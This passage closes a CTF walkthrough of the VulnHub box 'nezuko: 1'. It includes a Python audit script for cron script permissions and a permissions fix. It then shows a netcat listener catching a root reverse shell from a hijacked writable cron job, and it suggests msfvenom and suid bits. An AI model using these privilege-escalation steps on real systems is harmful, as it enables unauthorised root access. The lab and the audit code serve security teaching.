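    attrs = parse_lsattr(lsattr_line)
    group_w, world_w = mode[5] == "w", mode[8] == "w"
    findings = []
    if owner != "root":
        findings.append(f"{path}: owned by {owner}, but executed by root")
    if group_w:
        findings.append(f"{path}: group '{group}' can write")
    if world_w:
        findings.append(f"{path}: world-writable")
    if "a" in attrs and (owner != "root" or group_w or world_w):
        findings.append(f"{path}: append-only (+a) still lets a non-root "
                        "writer append commands")
    return findings


def audit_crontab(crontab_text, metadata):
    """metadata maps script path -> (ls -l line, lsattr line)."""
    findings = []
    for cmd in cron_commands(crontab_text):
        if cmd not in metadata:
            findings.append(f"{cmd}: no ls/lsattr data supplied")
            continue
        findings.extend(audit_script(cmd, *metadata[cmd]))
    return findings


# Assumed root crontab: the walkthrough only infers a 5-minute root job.
ASSUMED_ROOT_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * /home/zenitsu/to_nezuko/send_message_to_nezuko.sh
0 3 * * * /usr/local/sbin/backup.sh
@reboot /opt/cleanup.sh
"""
METADATA = {
    # ls/lsattr lines as shown on the page
    "/home/zenitsu/to_nezuko/send_message_to_nezuko.sh": (
        "-rw-r--r-- 1 zenitsu root 150 Ogos 21 09:39 send_message_to_nezuko.sh",
        "-----a--------e--- send_message_to_nezuko.sh"),
    # constructed: root-owned, not writable by others (clean)
    "/usr/local/sbin/backup.sh": (
        "-rwxr-xr-x 1 root root 812 Aug 20 10:00 backup.sh",
        "--------------e--- backup.sh"),
    # constructed: root-owned but world-writable
    "/opt/cleanup.sh": (
        "-rwxrwxrwx 1 root root 120 Aug 20 10:00 cleanup.sh",
        "--------------e--- cleanup.sh"),
}

if __name__ == "__main__":
    for finding in audit_crontab(ASSUMED_ROOT_CRONTAB, METADATA):
        print(finding)
```

The fix is the usual one: anything root runs unattended must live in a root-owned directory, be owned by root, and be writable only by root (`chown root:root`, `chmod 755`); if zenitsu needs to send messages, run the job as zenitsu instead.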

Start the listener and wait 5 minutes:

root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...

A long 5 minutes; go take a break~~

Five minutes later, the root shell arrives:

root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 8
-rw-r--r-- 1 root root 7190 Ogos 21 00:42 root.txt
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat

5. Afterword

For the password-cracking step, hashcat also works.

The reverse shell could also be generated with msfvenom.

For the final root step, you could also try changing the permissions of an executable, for example adding the suid bit.


6. References

Box download: nezuko: 1 ~ VulnHub https://www.vulnhub.com/entry/nezuko-1,352/

